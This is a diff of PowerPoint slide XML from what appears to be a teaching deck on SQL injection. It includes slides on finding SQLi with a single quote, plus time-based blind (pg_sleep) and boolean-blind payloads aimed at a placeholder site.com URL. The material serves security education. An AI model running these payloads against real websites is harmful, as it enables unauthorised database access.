+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Timebased Blind</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Payload: strpos((SELECT CASE WHEN 1=1 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>THEN pg_sleep(10) ELSE pg_sleep(0) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>END)::text, '1') &gt; 0</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>URL: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+                <a:hlinkClick r:id="rId1"/>
+              </a:rPr>
+              <a:t>Click</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Here</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="127" name="CustomShape 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="2468880"/>
+            <a:ext cx="10881360" cy="1463040"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Boolean Blind</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Payload: 1 and 1=1 (TRUE), 1 and 1=2 (FALSE)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>URL: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Click Here</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -4174,7 +4497,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="328680" y="534240"/>
-            <a:ext cx="11464920" cy="6132600"/>
+            <a:ext cx="11464560" cy="6132240"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4386,7 +4709,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4243320" y="1849320"/>
-            <a:ext cx="3584520" cy="2832840"/>
+            <a:ext cx="3584160" cy="2832480"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4647,7 +4970,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="274320" y="182880"/>
-            <a:ext cx="4570920" cy="363960"/>
+            <a:ext cx="4570560" cy="363600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4698,7 +5021,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4937760" y="182880"/>
-            <a:ext cx="2559600" cy="2488680"/>
+            <a:ext cx="2559240" cy="2488320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4749,7 +5072,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="5120640" y="2286000"/>
-            <a:ext cx="4205520" cy="490320"/>
+            <a:ext cx="4205160" cy="489960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4800,7 +5123,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4846320" y="3143520"/>
-            <a:ext cx="2285280" cy="330480"/>
+            <a:ext cx="2284920" cy="330120"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4851,7 +5174,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2743200" y="3657600"/>
-            <a:ext cx="7223040" cy="571320"/>
+            <a:ext cx="7222680" cy="570960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4902,7 +5225,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="5577840" y="4389120"/>
-            <a:ext cx="865800" cy="330480"/>
+            <a:ext cx="865440" cy="330120"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4953,7 +5276,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="4480560" y="5063760"/>
-            <a:ext cx="3199680" cy="330480"/>
+            <a:ext cx="3199320" cy="330120"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4974,6 +5297,11 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
                 <a:solidFill>
@@ -4983,18 +5311,7 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>www.site.com/?</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:uFillTx/>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>id=1+</a:t>
+              <a:t>www.site.com/?id=1+</a:t>
             </a:r>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
@@ -5021,7 +5338,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="2743200" y="5577840"/>
-            <a:ext cx="7223040" cy="571320"/>
+            <a:ext cx="7222680" cy="570960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5095,54 +5412,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="89" name="TextShape 1"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="182880" y="217440"/>
-            <a:ext cx="1552320" cy="331560"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>Finding SQLi</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="90" name="CustomShape 2"/>
+          <p:cNvPr id="89" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3111120" y="1226880"/>
-            <a:ext cx="6464880" cy="601920"/>
+            <a:off x="182880" y="217440"/>
+            <a:ext cx="1551960" cy="363960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5160,58 +5437,40 @@
         </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select product, stockcount from </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>products where id = 1 </a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="91" name="CustomShape 3"/>
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Finding SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="90" name="CustomShape 2"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4937760" y="640080"/>
-            <a:ext cx="2925720" cy="419040"/>
+            <a:off x="3111120" y="1226880"/>
+            <a:ext cx="6464520" cy="601560"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5232,45 +5491,48 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Finding SQL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Injections.</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="92" name="CustomShape 4"/>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select product, stockcount from products where id = 1 </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="91" name="CustomShape 3"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3136320" y="3017520"/>
-            <a:ext cx="6464880" cy="601920"/>
+            <a:off x="4937760" y="640080"/>
+            <a:ext cx="2925360" cy="418680"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5291,55 +5553,37 @@
             <a:noAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:pPr algn="ctr">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>site.com/products?id=1’</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select product, stockcount from </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>products where id = 1’ </a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="93" name="CustomShape 5"/>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Finding SQL Injections.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="92" name="CustomShape 4"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3684960" y="2283120"/>
-            <a:ext cx="5486400" cy="457200"/>
+            <a:off x="3136320" y="3017520"/>
+            <a:ext cx="6464520" cy="601560"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5371,43 +5615,37 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Enter a single </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>quote, and see </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>what happens.</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="94" name="CustomShape 6"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1’</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select product, stockcount from products where id = 1’ </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="93" name="CustomShape 5"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3657600" y="4480560"/>
-            <a:ext cx="5486400" cy="1371600"/>
+            <a:off x="3684960" y="2283120"/>
+            <a:ext cx="5486040" cy="456840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5439,40 +5677,45 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>SQL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Error </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>displa</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>yed?</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Enter a single quote, and see what happens.</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="94" name="CustomShape 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3657600" y="4480560"/>
+            <a:ext cx="5486040" cy="1371240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr algn="ctr">
               <a:lnSpc>
@@ -5485,35 +5728,29 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>HTTP </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Respon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>se </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>500?</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>SQL Error displayed?</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>HTTP Response 500?</a:t>
             </a:r>
             <a:br/>
             <a:r>
@@ -5522,26 +5759,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Item </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Not </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Found?</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Item Not Found?</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -5591,54 +5811,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="95" name="TextShape 1"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="182880" y="217080"/>
-            <a:ext cx="1552320" cy="331560"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>In-Band SQLi</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="96" name="CustomShape 2"/>
+          <p:cNvPr id="95" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
